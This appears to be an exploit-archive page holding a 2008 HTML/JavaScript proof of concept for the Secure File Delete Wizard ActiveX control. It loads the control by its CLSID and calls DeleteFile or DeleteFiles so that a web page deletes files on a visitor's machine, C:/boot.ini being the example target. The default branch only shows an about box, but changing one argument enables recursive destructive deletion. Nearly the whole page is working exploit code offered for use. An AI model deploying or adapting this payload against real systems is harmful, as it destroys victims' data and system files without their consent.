Secure File Delete Wizard <= 2.0.0 ActiveX Insecure Methods Exploit
2008-05-09 00:00:00<HTML>
<!--
- Secure File Delete Wizard <= 2.0.0 (SecureFileDeleteWizard.ocx) Remote File Deletetion/Insecure Method Exploit -
Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com
Description: ActiveX Remote Insecure/File Deletion
Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched
ActiveX: http://www.componentsource.com/products/seekford-secure-file-delete-wizard/downloads.html?rv=28108
The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions.
object.AboutBox() - Shows the about dialog - POC
object.DeleteFile(string path, int pass) - Deletes arg1, int passes
object.DeleteFiles(string path, string pattern, boolean deletesub, int passes) - Search's arg1 for arg2 pattern, and deletes all folders/files
-->
<OBJECT ID="filedel" CLASSID="CLSID:13B1B660-6516-4C8A-93C3-50E7EF524CFA">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - Secure File Delete Wizard <= 2.0.0 (SecureFileDeleteWizard.ocx) Remote File Deletetion/Insecure Method Exploit - */
/* Javascript Code By t0pP8uZz */
var file = "C:/boot.ini"; // local path to file for deletion
var pattern = "file*.txt"; // optional - if using DeleteFiles() then a pattern needs to be here, ie: file.*, * is a wildcard
var delsubs = true; // optional - if using DeleteFiles() then if set to true subdirectorys and files will be delete, if set to false the files will remain in tact
Exploit("AboutPOC"); // args: DeleteFile, DeleteFiles, AboutPOC
function Exploit(type) {
switch(type) {
case "DeleteFile":
filedel.DeleteFile(file, 3);
break
case "DeleteFiles":
filedel.DeleteFiles(file, pattern, delsubs, 3);
break
case "AboutPOC":
default:
filedel.AboutBox();
break;
}
alert("Exploit Successfull!")
};
</script>
</HTML>
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.